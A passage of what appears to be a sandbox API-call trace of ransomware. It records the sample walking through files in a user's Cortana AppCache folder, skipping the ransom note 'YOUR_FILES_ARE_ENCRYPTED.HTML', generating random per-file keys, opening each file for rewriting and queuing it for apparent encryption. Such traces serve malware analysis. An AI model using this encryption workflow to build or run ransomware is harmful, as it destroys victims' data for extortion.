2 [0119.108] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="76") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="7D") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="31") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="F5") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="72") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="35") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="76") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="2F") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="B9") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="F3") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="9C") returned 2 [0119.108] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="63") returned 2 [0119.108] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" [0119.109] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.109] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.109] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebdbc8f6, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebdbc8f6, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e6ebec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x581f, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", cAlternateFileName="C__WIN~4.TXT")) returned 1 [0119.109] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.109] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt") returned 196 [0119.109] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt") returned=".txt" [0119.109] lstrlenW (lpString=".txt") returned 4 [0119.109] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt") returned=".txt" [0119.109] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_5[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0119.109] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=22559) returned 1 [0119.109] GetProcessHeap () returned 0x600000 [0119.109] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0119.113] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="05") returned 2 [0119.113] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="74") returned 2 [0119.113] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="2E") returned 2 [0119.113] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="1A") returned 2 [0119.113] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="68") returned 2 [0119.113] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="47") returned 2 [0119.113] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="98") returned 2 [0119.113] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="79") returned 2 [0119.113] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="EA") returned 2 [0119.113] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="5B") returned 2 [0119.113] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="B5") returned 2 [0119.113] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="40") returned 2 [0119.113] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="74") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="60") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="71") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="28") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="60") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="AC") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="88") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="A3") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="64") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="8B") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="F2") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="92") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="6D") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="53") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="F8") returned 2 [0119.113] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="90") returned 2 [0119.114] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="4E") returned 2 [0119.114] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="B4") returned 2 [0119.114] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="47") returned 2 [0119.114] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="79") returned 2 [0119.114] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" [0119.114] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.114] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0119.114] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf36f47, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf36f47, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e6ebec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x4bc7, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", cAlternateFileName="C_345C~1.TXT")) returned 1 [0119.114] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.114] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt") returned 196 [0119.115] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt") returned=".txt" [0119.115] lstrlenW (lpString=".txt") returned 4 [0119.115] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt") returned=".txt" [0119.115] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_6[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0119.115] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=19399) returned 1 [0119.115] GetProcessHeap () returned 0x600000 [0119.115] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0119.118] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="09") returned 2 [0119.118] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="3A") returned 2 [0119.118] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="33") returned 2 [0119.118] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="59") returned 2 [0119.118] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="9E") returned 2 [0119.118] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="CB") returned 2 [0119.118] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="4A") returned 2 [0119.118] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="C9") returned 2 [0119.118] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="06") returned 2 [0119.118] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="4C") returned 2 [0119.118] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="78") returned 2 [0119.118] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="4A") returned 2 [0119.118] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="0F") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="17") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="60") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="D3") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="23") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="01") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="B8") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="4C") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="A7") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="9E") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="C7") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="7F") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="D9") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="CD") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="4F") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="73") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="B4") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="ED") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="8C") returned 2 [0119.118] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="04") returned 2 [0119.119] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" [0119.119] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.119] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0119.119] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf36f47, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf36f47, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x740, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", cAlternateFileName="C_BD17~1.TXT")) returned 1 [0119.119] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.119] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt") returned 196 [0119.119] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt") returned=".txt" [0119.119] lstrlenW (lpString=".txt") returned 4 [0119.119] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt") returned=".txt" [0119.119] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_7[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0119.121] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1856) returned 1 [0119.121] GetProcessHeap () returned 0x600000 [0119.121] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0119.124] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="C5") returned 2 [0119.124] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="93") returned 2 [0119.124] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="E9") returned 2 [0119.124] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="CA") returned 2 [0119.124] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="19") returned 2 [0119.124] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="08") returned 2 [0119.124] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="B8") returned 2 [0119.124] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="B0") returned 2 [0119.124] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="62") returned 2 [0119.124] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="7D") returned 2 [0119.124] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="F5") returned 2 [0119.124] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="E8") returned 2 [0119.124] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="52") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="A3") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="FE") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="40") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="08") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="CC") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="A9") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="6D") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="34") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="B0") returned 2 [0119.124] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="CD") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="8C") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="EF") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="10") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="EE") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="A9") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="FB") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="40") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="23") returned 2 [0119.125] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="4C") returned 2 [0119.125] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt" [0119.125] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.125] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0119.125] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf36f47, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf36f47, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59e48999, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0xc20d, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", cAlternateFileName="C_37E1~1.TXT")) returned 1 [0119.125] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.125] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt") returned 196 [0119.125] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt") returned=".txt" [0119.125] lstrlenW (lpString=".txt") returned 4 [0119.125] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt") returned=".txt" [0119.126] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_8[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0119.126] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=49677) returned 1 [0119.126] GetProcessHeap () returned 0x600000 [0119.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0119.128] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="2D") returned 2 [0119.128] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="71") returned 2 [0119.129] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="7A") returned 2 [0119.129] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="C3") returned 2 [0119.129] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="27") returned 2 [0119.129] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="D8") returned 2 [0119.129] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="9B") returned 2 [0119.129] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="B7") returned 2 [0119.129] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="DD") returned 2 [0119.129] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="35") returned 2 [0119.129] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="E3") returned 2 [0119.129] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="01") returned 2 [0119.129] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="E8") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="11") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="7D") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="17") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="83") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="DF") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="14") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="B4") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="A8") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="6D") returned 2 [0119.129] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="7C") returned 2 [0119.129] wsprintfW (in: 